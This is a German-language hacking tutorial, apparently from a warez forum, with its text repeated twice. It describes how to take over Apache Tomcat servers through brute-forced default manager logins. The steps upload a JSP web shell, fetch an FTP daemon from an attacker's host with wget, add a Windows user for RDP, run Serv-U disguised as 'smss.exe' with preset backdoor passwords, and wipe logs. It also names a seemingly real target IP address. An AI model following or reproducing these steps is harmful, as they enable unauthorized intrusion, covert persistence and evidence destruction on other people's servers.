Tomcat hacken
Zuerst brauchen wir einen Scan im folgenden Format
Manager bruted tomcat:tomcat at http://XXX:8080/manager/html Apache Tomcat/7.0.29 java 1.6.0_29-b11 Linux 2.6.18-400.1.1.el5
^ ^ ^
| | |
user passwort OS
Nun rufen wir den Link auf
Dort scrollen wir zum Bereich WAR file to deploy
auf Durchsuchen klicken
die dfn.war auswählen und auf Upload klicken
Wenn nun oben folgende Meldung erscheint hat der Upload geklappt
Wenn eine Error Meldung erscheint ist der Server bereits secured
Nun könnt ihr die Shell unter
http://XXX:8080/dfn/df.jsp
Linux Konsolen Befehle
df -h
Zeigt euch die Festplatten an
Filesystem Size Used Avail Use% Mounted on
/dev/ploop17109p1 500G 231G 249G 49% /
none 16G 4.0K 16G 1% /dev
none 3.3G 628K 3.2G 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 16G 12K 16G 1% /run/shm
Zeigt einen Speedtest an
--2015-02-25 19:44:41-- http://speedtest.dal01.softlayer.com/downloads/test100.zip
Resolving speedtest.dal01.softlayer.com (speedtest.dal01.softlayer.com)... 74.86.116.210
Connecting to speedtest.dal01.softlayer.com (speedtest.dal01.softlayer.com)|74.86.116.210|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104874307 (100M) [application/zip]
Saving to: `/dev/null'
2015-02-25 19:44:47 (16.5 MB/s) - `/dev/null' saved [104874307/104874307]
whoami
Zeigt den Benutzer an unter dem ihr in der Konsole angemeldet seit
tomcat6
FTPD einrichten
die ftpd.tar.gz mit Winrar öffnen und folgende Datei bearbeiten
\ftpd\conf\users.conf
#username;password;homedir;writeperm;totallogins;loginsperip;uploadrate;downloadrate;enabled
leech;password;%home%/home;false;10;10;0;0;true
fill;password;%home%/home;true;10;10;0;0;true
hier die user und passwörter eintragen
Am besten die ftpd auf nen anderen Server lagern dann kann man sie bequem von da runterladen,
ansonsten die tar.gz von lokal uploaden
wget http://IP_o._Domain/ftpd.tar.gz
tar -xvzf ftpd.tar.gz
chmod +x start_package.sh
./start_package.sh
Nun läuft der FTPd auf port 2221
Securen
Wenn man Root sein solltet
Die Datei tomcat-users.xml beartbeiten und ein neues Passwort wählen
Wenn man was ehr wahrscheinlich ist keine Root Rechte hat bleibt einem nur dem Ordner wo sich die Shells befinden zu schützen,
sprch die Schreibrechte zu entziehen.
dazu in den Hauptordner mit dem nahmen Tomcat, dort solltet ihr dann auch den Ordner webapps sehen
und in der Shell folgenden Befehl ausführen
chmod -R 555 webapps/*
Logs löschen
einfach alle Dateien in /tomcat/logs/ löschen, danach nicht mehr die Shell aufrufen !
Windows
Manager bruted admin: at http://62.193.61.44:8081/manager/html Apache Tomcat/5.5.20 java 1.5.0_08-b03 Windows NT (unknown) 6.1
^ ^ ^
| | |
user passwort OS
Nun rufen wir den Link auf
Dort scrollen wir zum Bereich WAR file to deploy
auf Durchsuchen klicken
die java.war auswählen und auf Upload klicken
Wenn nun oben folgende Meldung erscheint hat der Upload geklappt
Wenn eine Error Meldung erscheint ist der Server bereits secured
Nun könnt ihr die Shell aufrufen unter
http://XXX:8080/java/a.jsp
RDP.bat bearbeiten und PASSWORT durch euer Passwort ersetzen
net user ASP.NET PASSWORT /ad
Nun die fxp.exe & fxp.bat & die RDP.bat hochladen
In der Konsole die fxp.bat und die RDP.bat ausführen
Nun soltet ihr den Server auch per RDP erreichen können
und in der fxp.txt findet ihr dann die Server Informationen
ServU Einrichten
Standart Daten
Port: 2221
ServU Admin user
user: admin
pw: 4dm1n
leech Account
user: leech
pw: leech
Scaner Account
user: scan
pw: $c4n
Fill Account / GruppenAdministrator (Kann rausgegeben werden damit die Filler selber leech Accounts erstelen können)
Diese am besten per ServUAdmin einmal ändern und euch dann die smss.ini runterladen und dann diese immer benutzen.
Nun laden wir unsere ServU hoch
smss.exe smss.ini syswow64.bat system32.bat hochladen
Ja nachdem ob wir nen x86 /system32.bat) oder x64 (syswow64.bat) haben führen wir die entsprechende Datei aus.
Nun sollte euer FTP Server laufen
ftp://admin:Adm1n@IP:2221
nun löschen im Ordner C:\ wir noch die fxp.exe fxp.bat RDP.bat & die fxp.txt
wechseln in den Ordner
/Windows/SysWOW64/sysprep/
und laden die restlichen Files aus dem servu Ordner hoch damit AuthTLLS und die Login Meldungen funktionieren
Zurück in die shell und folgende Befehle ausführen um ServU neu zu starten
sc stop smss
sc start smss
Securen
Logs löschen
einfach alle Dateien in /tomcat/logs/ löschen, danach nicht mehr die Shell aufrufen !
Die Datei tomcat-users.xml beartbeiten und ein neues Passwort wählen
oder
Den Tomcat Manger deaktivieren, dann aber sicherstellen das ihr andersweitig auf den Server zugraifen könnt.
Zuerst brauchen wir einen Scan im folgenden Format
Manager bruted tomcat:tomcat at http://XXX:8080/manager/html Apache Tomcat/7.0.29 java 1.6.0_29-b11 Linux 2.6.18-400.1.1.el5
^ ^ ^
| | |
user passwort OS
Nun rufen wir den Link auf
Dort scrollen wir zum Bereich WAR file to deploy
auf Durchsuchen klicken
die dfn.war auswählen und auf Upload klicken
Wenn nun oben folgende Meldung erscheint hat der Upload geklappt
Wenn eine Error Meldung erscheint ist der Server bereits secured
Nun könnt ihr die Shell unter
http://XXX:8080/dfn/df.jsp
Linux Konsolen Befehle
df -h
Zeigt euch die Festplatten an
Filesystem Size Used Avail Use% Mounted on
/dev/ploop17109p1 500G 231G 249G 49% /
none 16G 4.0K 16G 1% /dev
none 3.3G 628K 3.2G 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 16G 12K 16G 1% /run/shm
Code:
wget -O /dev/null http://speedtest.dal01.softlayer.com/downloads/test100.zipZeigt einen Speedtest an
--2015-02-25 19:44:41-- http://speedtest.dal01.softlayer.com/downloads/test100.zip
Resolving speedtest.dal01.softlayer.com (speedtest.dal01.softlayer.com)... 74.86.116.210
Connecting to speedtest.dal01.softlayer.com (speedtest.dal01.softlayer.com)|74.86.116.210|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104874307 (100M) [application/zip]
Saving to: `/dev/null'
2015-02-25 19:44:47 (16.5 MB/s) - `/dev/null' saved [104874307/104874307]
whoami
Zeigt den Benutzer an unter dem ihr in der Konsole angemeldet seit
tomcat6
FTPD einrichten
die ftpd.tar.gz mit Winrar öffnen und folgende Datei bearbeiten
\ftpd\conf\users.conf
#username;password;homedir;writeperm;totallogins;loginsperip;uploadrate;downloadrate;enabled
leech;password;%home%/home;false;10;10;0;0;true
fill;password;%home%/home;true;10;10;0;0;true
hier die user und passwörter eintragen
Am besten die ftpd auf nen anderen Server lagern dann kann man sie bequem von da runterladen,
ansonsten die tar.gz von lokal uploaden
wget http://IP_o._Domain/ftpd.tar.gz
tar -xvzf ftpd.tar.gz
chmod +x start_package.sh
./start_package.sh
Nun läuft der FTPd auf port 2221
Securen
Wenn man Root sein solltet
Die Datei tomcat-users.xml beartbeiten und ein neues Passwort wählen
Wenn man was ehr wahrscheinlich ist keine Root Rechte hat bleibt einem nur dem Ordner wo sich die Shells befinden zu schützen,
sprch die Schreibrechte zu entziehen.
dazu in den Hauptordner mit dem nahmen Tomcat, dort solltet ihr dann auch den Ordner webapps sehen
und in der Shell folgenden Befehl ausführen
chmod -R 555 webapps/*
Logs löschen
einfach alle Dateien in /tomcat/logs/ löschen, danach nicht mehr die Shell aufrufen !
Windows
Manager bruted admin: at http://62.193.61.44:8081/manager/html Apache Tomcat/5.5.20 java 1.5.0_08-b03 Windows NT (unknown) 6.1
^ ^ ^
| | |
user passwort OS
Nun rufen wir den Link auf
Dort scrollen wir zum Bereich WAR file to deploy
auf Durchsuchen klicken
die java.war auswählen und auf Upload klicken
Wenn nun oben folgende Meldung erscheint hat der Upload geklappt
Wenn eine Error Meldung erscheint ist der Server bereits secured
Nun könnt ihr die Shell aufrufen unter
http://XXX:8080/java/a.jsp
RDP.bat bearbeiten und PASSWORT durch euer Passwort ersetzen
net user ASP.NET PASSWORT /ad
Nun die fxp.exe & fxp.bat & die RDP.bat hochladen
In der Konsole die fxp.bat und die RDP.bat ausführen
Nun soltet ihr den Server auch per RDP erreichen können
und in der fxp.txt findet ihr dann die Server Informationen
ServU Einrichten
Standart Daten
Port: 2221
ServU Admin user
user: admin
pw: 4dm1n
leech Account
user: leech
pw: leech
Scaner Account
user: scan
pw: $c4n
Fill Account / GruppenAdministrator (Kann rausgegeben werden damit die Filler selber leech Accounts erstelen können)
View hidden content is available for registered users!
user: GroupAdmin
pw: Gr0Up4dmIn
pw: Gr0Up4dmIn
Diese am besten per ServUAdmin einmal ändern und euch dann die smss.ini runterladen und dann diese immer benutzen.
Nun laden wir unsere ServU hoch
smss.exe smss.ini syswow64.bat system32.bat hochladen
Ja nachdem ob wir nen x86 /system32.bat) oder x64 (syswow64.bat) haben führen wir die entsprechende Datei aus.
Nun sollte euer FTP Server laufen
ftp://admin:Adm1n@IP:2221
nun löschen im Ordner C:\ wir noch die fxp.exe fxp.bat RDP.bat & die fxp.txt
wechseln in den Ordner
/Windows/SysWOW64/sysprep/
und laden die restlichen Files aus dem servu Ordner hoch damit AuthTLLS und die Login Meldungen funktionieren
Zurück in die shell und folgende Befehle ausführen um ServU neu zu starten
sc stop smss
sc start smss
Securen
Logs löschen
einfach alle Dateien in /tomcat/logs/ löschen, danach nicht mehr die Shell aufrufen !
Die Datei tomcat-users.xml beartbeiten und ein neues Passwort wählen
oder
Den Tomcat Manger deaktivieren, dann aber sicherstellen das ihr andersweitig auf den Server zugraifen könnt.